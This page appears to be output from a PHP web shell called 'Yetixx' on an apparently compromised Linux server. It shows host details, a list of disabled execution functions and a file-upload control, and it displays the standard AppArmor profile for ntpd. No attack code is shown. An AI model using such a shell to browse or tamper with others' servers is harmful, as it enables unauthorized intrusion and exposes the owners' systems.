Yetixx
Yetixx
Server: nginx/1.28.0
System: Linux instance-rr9enuui 6.1.0-15-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.66-1 (2023-12-09) x86_64
User: www (1000)
PHP: 8.0.26
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /proc/self/root/etc/apparmor.d/
Upload Files
File: //proc/self/root/etc/apparmor.d/usr.sbin.ntpd
# vim:syntax=apparmor
# Updated for Ubuntu by: Jamie Strandboge <jamie@canonical.com>
# ------------------------------------------------------------------
#
#    Copyright (C) 2002-2005 Novell/SUSE
#    Copyright (C) 2009-2012 Canonical Ltd.
#
#    This program is free software; you can redistribute it and/or
#    modify it under the terms of version 2 of the GNU General Public
#    License published by the Free Software Foundation.
#
# ------------------------------------------------------------------

#include <tunables/global>
#include <tunables/ntpd>
/usr/sbin/ntpd flags=(attach_disconnected) {
  #include <abstractions/base>
  #include <abstractions/nameservice>
  #include <abstractions/openssl>
  #include <abstractions/user-tmp>

  capability ipc_lock,
  capability net_admin,
  capability net_bind_service,
  capability setgid,
  capability setuid,
  capability sys_chroot,
  capability sys_resource,
  capability sys_time,
  capability sys_nice,

  # ntp uses AF_INET, AF_INET6 and AF_UNSPEC
  network dgram,
  network stream,

  @{PROC}/net/if_inet6 r,
  @{PROC}/*/net/if_inet6 r,
  @{NTPD_DEVICE} rw,
  # pps devices are almost exclusively used with NTP
  /dev/pps[0-9]* rw,

  /{,s}bin/      r,
  /usr/{,s}bin/  r,
  /usr/local/{,s}bin/  r,
  /usr/sbin/ntpd rmix,

  /etc/ntpsec/ntp.conf r,
  /etc/ntpsec/ntp.d/ r,
  /etc/ntpsec/ntp.d/*.conf r,
  /run/ntpsec/ntp.conf.dhcp r,

  /etc/ntpsec/cert-chain.pem r,
  /etc/ntpsec/key.pem r,
  /etc/ntpsec/ntp.keys r,

  /var/lib/ntpsec/ntp.drift rw,
  /var/lib/ntpsec/ntp.drift-tmp rw,
  /var/lib/ntpsec/nts-keys rw,
  /usr/share/zoneinfo/leap-seconds.list rw,

  /var/log/ntp w,
  /var/log/ntp.log w,
  /var/log/ntpd w,
  /var/log/ntpsec/clockstats* rwl,
  /var/log/ntpsec/loopstats*  rwl,
  /var/log/ntpsec/peerstats*  rwl,
  /var/log/ntpsec/protostats* rwl,
  /var/log/ntpsec/rawstats*   rwl,
  /var/log/ntpsec/sysstats*   rwl,

  /{,var/}run/ntpd.pid w,

  # to be able to check for running ntpdate
  /run/lock/ntpsec-ntpdate wk,

  # To sign replies to MS-SNTP clients by the smbd daemon /var/lib/samba
  /var/lib/samba/ntp_signd/socket rw,

  # For use with clocks that report via shared memory (e.g. gpsd),
  # you may need to give ntpd access to all of shared memory, though
  # this can be considered dangerous. See https://launchpad.net/bugs/722815
  # for details. To enable, add this to local/usr.sbin.ntpd:
  #     capability ipc_owner,

  # Site-specific additions and overrides. See local/README for details.
  #include <local/usr.sbin.ntpd>
}
@ Telegram